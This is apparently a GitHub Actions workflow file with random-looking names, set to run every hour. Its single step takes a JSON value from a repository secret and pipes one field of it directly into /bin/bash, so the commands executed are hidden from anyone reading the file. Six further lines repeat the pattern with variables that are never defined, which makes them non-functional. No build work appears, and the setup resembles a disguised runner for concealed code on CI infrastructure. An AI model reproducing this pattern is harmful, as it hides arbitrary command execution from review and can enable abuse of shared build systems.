name: luzhishen5678
on:
  workflow_dispatch:
  schedule:
    - cron: '44 * * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luzhishen5678
        env:
          pg89195: ${{ secrets.pg89195 }}
        run: |
          echo $pg89195 | jq -r .yl3 | /bin/bash
          echo $bg1 | jq -r .oxhv1441 | /bin/bash
          echo $p6 | jq -r .rrxv214 | /bin/bash
          echo $j15550 | jq -r .bvlt02 | /bin/bash
          echo $xbgow4 | jq -r .rnxzb513 | /bin/bash
          echo $qliw9 | jq -r .ayfu53 | /bin/bash
          echo $mkr6324 | jq -r .j31959 | /bin/bash

